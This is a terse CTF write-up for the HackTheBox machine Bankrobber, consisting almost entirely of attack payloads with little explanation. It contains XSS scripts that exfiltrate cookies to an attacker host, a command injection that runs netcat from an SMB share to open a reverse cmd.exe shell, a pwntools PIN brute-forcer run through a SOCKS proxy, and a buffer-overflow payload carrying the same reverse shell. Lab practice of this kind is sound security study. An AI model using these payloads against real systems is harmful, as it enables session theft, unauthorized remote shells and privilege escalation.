Bankrobber @ HackTheBox

07Mar

Bankrobber @ HackTheBox

By CTF , , , , ,

Bankrobber is a 50-point machine on hackthebox that involves exploiting a cross site scripting vulnerability to gain access to an admin account, using a command injection to get a user shell and exploiting a simple buffer overflow to become system.

Notes

XSS-Payloads:

<script src="http://<ip>:8000/script.js"></script>

function addImg(){
    var img = document.createElement('img');
    img.src = 'http://<ip>:8000/' + document.cookie;
    document.body.appendChild(img);
}
addImg();

var xhr = new XMLHttpRequest();
document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
var uri ="/admin/backdoorchecker.php";
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("cmd=dir|\\\\<ip>\\xshare\\share\\nc.exe <ip> 7000 -e cmd.exe");

SSF:

https://securesocketfunneling.github.io/ssf/#home

Python-Scripts:

from pwn import *

context.proxy = (socks.SOCKS4, 'localhost', 9090)
p = remote('localhost', 910, level='info')    
p.interactive()

from pwn import *

context.proxy = (socks.SOCKS4, 'localhost', 9090)

for i in range(1000):
    p = remote('localhost', 910, level='info')
    p.recvuntil('[$] ')
    pin = str(i).zfill(4)
    p.sendline(pin)
    result = p.recvline()
    if not "denied" in result:
        log.success("Found Pin:" + str(pin))
        break
p.interactive()

Overflow-Payload:

AAAAAAAABBBBBBBCCCCCCCCDDDDDDD\\\\10.10.14.2\xshare\share\nc.exe <ip> 7000 -e cmd.exe

Share this post

Author

Related Posts

16Mar

Carrier @ HackTheBox

Carrier is a nice, medium difficulty machine on hackthebox.eu featuring information retrieval via snmp, command injection and bgp hijacking. The... read more

13Jun

Monteverde @ HackTheBox

Monteverde is a 30-point Windows machine on HackTheBox that involves some LDAP and SMB enumeration to get the user flag.... read more

14Aug

DNS Rebinding, XSS & 2FA SSH – Crossfit2 @ HackTheBox

We are solving Crossfit2, a 50-point OpenBSD machine on HackTheBox. read more

17Sep

SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox

Video & additional notes for StreamIO, a medium difficulty Windows machine on HackTheBox that involves manual MSSQL Injection, going from... read more

25May

Luke @ HackTheBox

Luke is a rather short, easy machine on hackthebox, which was nonetheless fun to solve and our team got both... read more

15May

Ghoul @ HackTheBox

Ghoul is a nice 40 points machine on hackthebox involving zip traversal, lateral movement, public exploits and some obscure hidden... read more

14Mar

Postman @ HackTheBox

Postman is a 20-point machine on hackthebox, that involves using redis to write an ssh key to disk, cracking the... read more

21Nov

Buff @ HackTheBox

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a... read more

23Mar

Frolic @ HackTheBox

Frolic is a medium difficulty machine on hackthebox.eu, featuring a lot of CTF-ish language conversions, the usage of a public... read more

06Nov

Active Directory, Reverse Engineering & Unintended Solutions – Pivotapi @ HackTheBox

We are solving Pivotapi, a 50-point Windows machine on HackTheBox. This one involves some Reverse Engineering, MSSQL, and Active Directory... read more